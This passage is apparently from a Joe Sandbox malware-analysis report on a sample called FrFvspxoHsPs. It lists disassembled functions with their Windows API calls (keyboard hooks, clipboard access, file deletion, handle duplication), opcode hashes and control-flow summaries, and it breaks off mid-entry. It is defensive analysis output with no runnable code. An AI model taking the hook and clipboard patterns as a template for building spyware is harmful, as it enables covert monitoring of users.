                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 514d3aa856cf29e20fef5ae96f1c05c48721c1c4d242e211d11cce1ca553caf6
                                • Instruction ID: cdbeb12f734f35d1b7930c0cd8fcc0d466a2756c99c2b6731ac07ac702ba2582
                                • Opcode Fuzzy Hash: 514d3aa856cf29e20fef5ae96f1c05c48721c1c4d242e211d11cce1ca553caf6
                                • Instruction Fuzzy Hash: B63100B0E01259DFEB64CF99C994BDEBBF1AF48314F248059E404AB290DBB4A845CF55
                                Function 06F39E30 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 489 6f39e30-6f39e37 490 6f39e38-6f39ecc DuplicateHandle 489->490 491 6f39ed5-6f39ef2 490->491 492 6f39ece-6f39ed4 490->492 492->491
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F39EBF
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 2ab0817e75aaf38f034f00c8288f9aef4d890b99f48a148403bf0db768236d48
                                • Instruction ID: f30af0752e809868182efef442f1d18ded908160793dcac0b37f84fa9647de8f
                                • Opcode Fuzzy Hash: 2ab0817e75aaf38f034f00c8288f9aef4d890b99f48a148403bf0db768236d48
                                • Instruction Fuzzy Hash: 732105B59002499FDB10CFAAD484ADEFFF4FB48320F14845AE954A3310D374A940CF61
                                Function 06F39E38 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 495 6f39e38-6f39ecc DuplicateHandle 496 6f39ed5-6f39ef2 495->496 497 6f39ece-6f39ed4 495->497 497->496
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F39EBF
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: af409cd7ebf10a0a57f280af43f48819e045cbf5127b54545df6e1d3769a6671
                                • Instruction ID: 7bcdbf6c51e60b28b088bfbebee32821bf21680b17982e2c579d158a0a23cb3c
                                • Opcode Fuzzy Hash: af409cd7ebf10a0a57f280af43f48819e045cbf5127b54545df6e1d3769a6671
                                • Instruction Fuzzy Hash: A021E3B59002499FDB10CF9AD884ADEBBF4FB48320F14841AE918A3350D374A944CF64
                                Function 06F3D548 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 500 6f3d548-6f3d59a 503 6f3d5a6-6f3d5d8 SetWindowsHookExA 500->503 504 6f3d59c-6f3d5a4 500->504 505 6f3d5e1-6f3d601 503->505 506 6f3d5da-6f3d5e0 503->506 504->503 506->505
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F3D5CB
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: 5b2f97cdfb30a97ef55b872c86062e2607184508b8ec8409193a199123a62379
                                • Instruction ID: af8c55a775ea04fa4dad349bb089e940d4c403ef7835a433977ab06dd8af970a
                                • Opcode Fuzzy Hash: 5b2f97cdfb30a97ef55b872c86062e2607184508b8ec8409193a199123a62379
                                • Instruction Fuzzy Hash: 97213476D002189FDB54CF9AD844BEEFBF5EF88310F10842AD458A7250C774A944CFA1
                                Function 03218038 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 032180B0
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3859634733.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_3210000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 520983e1d8b1e8ab86273b76435275ff64cd82a553ec0f0387a12f19fb40e7c9
                                • Instruction ID: 8255edb5cafeffd99d1e661f6b8aba757c691633d20aa6c3e657f0fd501d59d8
                                • Opcode Fuzzy Hash: 520983e1d8b1e8ab86273b76435275ff64cd82a553ec0f0387a12f19fb40e7c9
                                • Instruction Fuzzy Hash: 212156B6C1065A8BCB10CF9AD54079EFBF0BF48320F14856AD858A7340D378A954CFA0
                                Function 06F3D550 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F3D5CB
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: e2ee7f44a705a15cb6d9c5bd62feaa827d949334c05e2bee22459f8c14b043d1
                                • Instruction ID: 24b501ddb21a42e606355987bb68166e2c34dceae4819a115c3d876b575cf69c
                                • Opcode Fuzzy Hash: e2ee7f44a705a15cb6d9c5bd62feaa827d949334c05e2bee22459f8c14b043d1
                                • Instruction Fuzzy Hash: 242122B1D002199FDB54DFAAC844BEEFBF5EF88320F10842AE418A7250C774A944CFA0
                                Function 03218040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 032180B0
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3859634733.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_3210000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 864e07b3fbea68834792dc865b5eefc6b913ca184e95036bc8a66337b8d0599e
                                • Instruction ID: 2b2aaec8ba957d831077c1acfb06f64198de89a91d9187c38740841c80191c6b
                                • Opcode Fuzzy Hash: 864e07b3fbea68834792dc865b5eefc6b913ca184e95036bc8a66337b8d0599e
                                • Instruction Fuzzy Hash: 1D1133B2C1065A9BCB24CF9AD544B9EFBF4FF48320F14816AD818A7240D378A954CFA5
                                Function 0321EF78 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 0321EFDF
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3859634733.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_3210000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 504525155b70e40c6331e87a9642f76d548c44ec6e3f81480c815d4df01fe4e0
                                • Instruction ID: 10f8b068f010a295131fa69a06df033c28ea6129c20f46dd7f2ff454851a90bb
                                • Opcode Fuzzy Hash: 504525155b70e40c6331e87a9642f76d548c44ec6e3f81480c815d4df01fe4e0
                                • Instruction Fuzzy Hash: 021123B2C1065A9BDB10CF9AC544BDEFBF4EF48320F15816AE818A7240D378A954CFA5
                                Function 06F337CC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 06F34EF6
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 7a6b1cff6fe419fb95030ef9bf619b4442b7265a93cd400cb1651a4ebd2e1d87
                                • Instruction ID: 842f8ecbbcc1b41a2d7ab8ac3547fac394ebebb4d653225cf333a7b336195457
                                • Opcode Fuzzy Hash: 7a6b1cff6fe419fb95030ef9bf619b4442b7265a93cd400cb1651a4ebd2e1d87
                                • Instruction Fuzzy Hash: 35113FB6C003498FDB10CF9AC444B9EFBF4EB88220F11842AD828B7210D378A944CFA4
                                Function 06F34E8A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 06F34EF6
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: ca9afc4dc562260040a4e877bcdf6a0a67ea86600136c63d341eeb1ff2e7c66d
                                • Instruction ID: 01d11b45a895537b08f7c5fa47bc60effd9ff66974f3b768d0228c3ce2802be5
                                • Opcode Fuzzy Hash: ca9afc4dc562260040a4e877bcdf6a0a67ea86600136c63d341eeb1ff2e7c66d
                                • Instruction Fuzzy Hash: FE1102B6C006898FDB10CF9AC444BDEFBF4AB89210F15845AD468B7710D379A545CFA5
                                Function 06F3B30F Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06F3B91D
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 737b2f0cc4e0b501a57cab9c3167ef2814229bb4a4ed9e23d5881a1022f6d38a
                                • Instruction ID: 6896e19a0c7d374cd811300ca1111f37422b41abf1a695ad6b93d2192c3d166e
                                • Opcode Fuzzy Hash: 737b2f0cc4e0b501a57cab9c3167ef2814229bb4a4ed9e23d5881a1022f6d38a
                                • Instruction Fuzzy Hash: FF1133B18042498FDB10DF9AD445BDEFBF4EB58320F20845AE958A7700D379A944CFA5
                                Function 06F3B8C1 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06F3B91D
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: a674d4bf7a8b19974c966ecd3afa751de2c329f348a526d8d83da9fa908c012c
                                • Instruction ID: b54177501fb22f40502d3560be98b6f8d607a1777865457cf5458dccb7d3c1bd
                                • Opcode Fuzzy Hash: a674d4bf7a8b19974c966ecd3afa751de2c329f348a526d8d83da9fa908c012c
                                • Instruction Fuzzy Hash: C31133B58042498FCB10CFAAD484BCEFBF4EB58220F24845AD558A7200D378A544CFA5
                                Function 06F3B318 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06F3B91D
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: a7464122bec6138bf391992b3921f04f3d11e1f331fd7493a96aa3c443d51829
                                • Instruction ID: 5897d4b817b692fe8fab776581cad1798957be49258d53c16e34ca85a87f57a0
                                • Opcode Fuzzy Hash: a7464122bec6138bf391992b3921f04f3d11e1f331fd7493a96aa3c443d51829
                                • Instruction Fuzzy Hash: 341115B58043498FDB10DF9AD448BDEFBF4EB58320F208459D519A7740D374A944CFA5
                                Function 06F39A6C Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F3AFD5), ref: 06F3B05F
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: c8da46cfad566c4c379edf241f373115a54a666151bff62ff14889f120eb5753
                                • Instruction ID: 634211613ba6b90cf6c8596213c77e4ec85624617a851924a7e7a04a237d7aef
                                • Opcode Fuzzy Hash: c8da46cfad566c4c379edf241f373115a54a666151bff62ff14889f120eb5753
                                • Instruction Fuzzy Hash: C61133B18003498FDB20CF9AD948BDEFBF4EB48320F20845AD518A7240D374A944CFA4
                                Function 06F3AFF8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F3AFD5), ref: 06F3B05F
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 4bf04e916093d8e51834cd031c758b8d8bc72e1f1fe2f652210dd04e99808cf0
                                • Instruction ID: cb4ad8d1d6ac2c833bf07295843a60f414306fca1da7beab2df36ae8e881f31f
                                • Opcode Fuzzy Hash: 4bf04e916093d8e51834cd031c758b8d8bc72e1f1fe2f652210dd04e99808cf0
                                • Instruction Fuzzy Hash: CA1142B5C00248CFDB20CF9AD588BDEFBF4EB48320F20845AE528A7240C375A944CFA5
                                Function 06F459D0 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 76e73847b92ea5fd55d991d471839afc9d2264e9a24bc500763e865a29aa060f
                                • Instruction ID: d8a5075e6c24de38479f0de27341c447d0c22f85a226d02959071c233bff637d
                                • Opcode Fuzzy Hash: 76e73847b92ea5fd55d991d471839afc9d2264e9a24bc500763e865a29aa060f
                                • Instruction Fuzzy Hash: E6814675E012189FDB14EBA4C954ADEBBF6EF88720F208168D401BB354DB71AD46CFA0
                                Function 06F4D068 Relevance: .8, Instructions: 799COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e75ce902e4e2e318b604c0e27632e01748ea3f1ed3a78b6228491077fb67cdf
                                • Instruction ID: 73bb001259f16d86ccde1ad5caeed915ccf50e5297b667d2c15c1d54eecccdaa
                                • Opcode Fuzzy Hash: 1e75ce902e4e2e318b604c0e27632e01748ea3f1ed3a78b6228491077fb67cdf
                                • Instruction Fuzzy Hash: 96628874A00309CFDB55EB68D490AAEBBB6FF88300F208A68D4159F755DB75EC56CB80
                                Function 06F4C2A8 Relevance: .6, Instructions: 645COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83af9dc77ae38e91d759afe281909458ca6b7dadfb2bd00cc0e4acc83af7bd36
                                • Instruction ID: ff77f2774819f1195efa4a047727075aa89f9d5a87db6365c84dd80a68fd8d99
                                • Opcode Fuzzy Hash: 83af9dc77ae38e91d759afe281909458ca6b7dadfb2bd00cc0e4acc83af7bd36
                                • Instruction Fuzzy Hash: 7D327F34F112088FDB54EB68D890BAEBBB6FB89310F209529E505EB751DB35EC41CB91
                                Function 06F4B3DF Relevance: .6, Instructions: 557COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 55f75cfb2961a35da2fc6a07fbd841aef6d18214b6344e659e4b360c9badbeed
                                • Instruction ID: fa6219618cb10ed43508d6b637eec4d3fb8f604caebe7c5975e1ea3aa894e0c0
                                • Opcode Fuzzy Hash: 55f75cfb2961a35da2fc6a07fbd841aef6d18214b6344e659e4b360c9badbeed
                                • Instruction Fuzzy Hash: 40225334E002098FEF64DBA8D4907ADBBB5FB49310F248866E415EB796DB35DC81CB51
                                Function 06F4ADE0 Relevance: .4, Instructions: 388COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 736e774683a2c9967bab87eb551d0e105b2ff5ceb4e57ffb063e0d3e0e5d6b4f
                                • Instruction ID: a23d2fe4361df5b439c98ef1a6f71249c07e84de362d0877d84146037bb42a30
                                • Opcode Fuzzy Hash: 736e774683a2c9967bab87eb551d0e105b2ff5ceb4e57ffb063e0d3e0e5d6b4f
                                • Instruction Fuzzy Hash: C6E18E30F103098FDB65EBA9D4906AEBBB6FF88300F208529D516AB745DB74EC45CB91
                                Function 07632148 Relevance: .4, Instructions: 350COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4584e556e65eaf558dbad68c33e0bb3c3d685826f05818f2d448d2c05755c91c
                                • Instruction ID: 6361ca7ac957058e7b2695d5edb6b6be46fc733f7ab1f722360fcb7b6552bc75
                                • Opcode Fuzzy Hash: 4584e556e65eaf558dbad68c33e0bb3c3d685826f05818f2d448d2c05755c91c
                                • Instruction Fuzzy Hash: F2D19CB0E003099FDB14DFA8C86469EBBF1FF89310F148569D406AB391DB74AD85CB91
                                Function 06F49260 Relevance: .2, Instructions: 231COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b3b1162c58f4134bce89fffabb7fe7d22836f68fef8ecb99355fea04164786fa
                                • Instruction ID: dffa1514d706120d4a6e6d7f628a032aef801cae84db85d82e3490b294e0a0a3
                                • Opcode Fuzzy Hash: b3b1162c58f4134bce89fffabb7fe7d22836f68fef8ecb99355fea04164786fa
                                • Instruction Fuzzy Hash: DB915F70F106098FDB54DB69D8A07AEBBF6FBC8300F508569C909AB744EF74AD418B91
                                Function 06F46300 Relevance: .2, Instructions: 229COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c30a11dcbc1bdb899284b9bef1bbf699b0769328d403fce729c23aa7f976617e
                                • Instruction ID: 774c4655e4d1d7bb0a8d931f4beac1f271c183784ced7f22d1979fcbbe3117b2
                                • Opcode Fuzzy Hash: c30a11dcbc1bdb899284b9bef1bbf699b0769328d403fce729c23aa7f976617e
                                • Instruction Fuzzy Hash: 356182B1F001104FDF54ABAEC89466EAEE7AF85620B154479D80ADB360DF75ED0287D1
                                Function 06F443B1 Relevance: .2, Instructions: 222COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 997a72009c0d65f134d99532a045e49f99fdce6ea4f121f459391a5c2a782acd
                                • Instruction ID: abafa00767ebc6ff197036281f934d51c9811a0274bb576df99bc9e09dba3abc
                                • Opcode Fuzzy Hash: 997a72009c0d65f134d99532a045e49f99fdce6ea4f121f459391a5c2a782acd
                                • Instruction Fuzzy Hash: A5812C74F102098FDB54EBA8D4A07AEBBF2FB89300F108529D509EB754DB75EC428B91
                                Function 06F446CC Relevance: .2, Instructions: 217COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8cfed318e3317bad2c6a07cf5fd9132383ee7dfe3f93115e630af232326d33c
                                • Instruction ID: a0e1a46fe9d141a8a5f01ecd463101c4f8254347f12a2ed8148ef932ea064aae
                                • Opcode Fuzzy Hash: a8cfed318e3317bad2c6a07cf5fd9132383ee7dfe3f93115e630af232326d33c
                                • Instruction Fuzzy Hash: 53915D34E106198BDF60DF68C890B9DBBB1FF89310F208599D549BB285DB71AA86CF50
                                Function 06F443C1 Relevance: .2, Instructions: 216COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8fac204eaca34c491637e0bd1a7af94502e72eb22603def20ace5ec54ce15faf
                                • Instruction ID: 93188c0c06c76027c241bb12603d0046c88761ae75d54130a21ae77d86cad94c
                                • Opcode Fuzzy Hash: 8fac204eaca34c491637e0bd1a7af94502e72eb22603def20ace5ec54ce15faf
                                • Instruction Fuzzy Hash: 39810C74F102098FDB54DBA9D46076EBBF2FB89300F108529D509EB754DB75EC428B91
                                Function 06F446E0 Relevance: .2, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7bda22051e522cca2fb215b5773aead1ef79fcd9fa022b9cb3cc3011340a1fc
                                • Instruction ID: c33516e373facd1ee109769975e780c61727bb16f4964e9b8bf3ecf6ba5c9b7d
                                • Opcode Fuzzy Hash: b7bda22051e522cca2fb215b5773aead1ef79fcd9fa022b9cb3cc3011340a1fc
                                • Instruction Fuzzy Hash: B6913F34E106198BDF60DF68C880B9DBBB1FF89310F208599D559BB345DB71AA85CF50
                                Function 06F4F040 Relevance: .2, Instructions: 201COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 68d43807c03f640ac36ce3250bb1c7835d416530fe77f00a592f302dc8b3e041
                                • Instruction ID: 4ec537e66952d7763df422c9c89e9305fd5b4c5c915491175b0ec2b5a8ad4d68
                                • Opcode Fuzzy Hash: 68d43807c03f640ac36ce3250bb1c7835d416530fe77f00a592f302dc8b3e041
                                • Instruction Fuzzy Hash: FD712974E012489FDB54EBA8D980AAEBBF6FF88300F248429D419AB754DB30ED45CB50
                                Function 06F4F031 Relevance: .2, Instructions: 201COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 266ab90b6105e780aba11790a1f03cb21ac54fcb500216b5260221f0862f1aaa
                                • Instruction ID: 93873e45d4a1493050bf424d9853809d20de6a13e6706ba4900eacbfbae3ecb8
                                • Opcode Fuzzy Hash: 266ab90b6105e780aba11790a1f03cb21ac54fcb500216b5260221f0862f1aaa
                                • Instruction Fuzzy Hash: 89711974E012488FDB54EBA8D980AADBBF6FFC8300F248529D419EB654DB30ED46CB50
                                Function 06F44C78 Relevance: .2, Instructions: 186COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e95a101a5f63fb8d7399bf2e4dd5b2d3606994fb99706ed8d33d56193a5e993
                                • Instruction ID: 0e08035804111e15e2b2f9495474e10c4eedfde6169d26d81df56aa012775cf5
                                • Opcode Fuzzy Hash: 1e95a101a5f63fb8d7399bf2e4dd5b2d3606994fb99706ed8d33d56193a5e993
                                • Instruction Fuzzy Hash: CA617F74F003189FEB54EBA9C8557AEBBF6EF88700F208429D506AB391DB758C458B90
                                Function 06F4FCC1 Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ebd8536f45af4018a8ff04fe5cb44c060ceb0cb9733b75cce686862f211a4b1f
                                • Instruction ID: e9c8d39ac0d5c053035574e388673c29a58560e3b14b4ee6244629f435e546ee
                                • Opcode Fuzzy Hash: ebd8536f45af4018a8ff04fe5cb44c060ceb0cb9733b75cce686862f211a4b1f
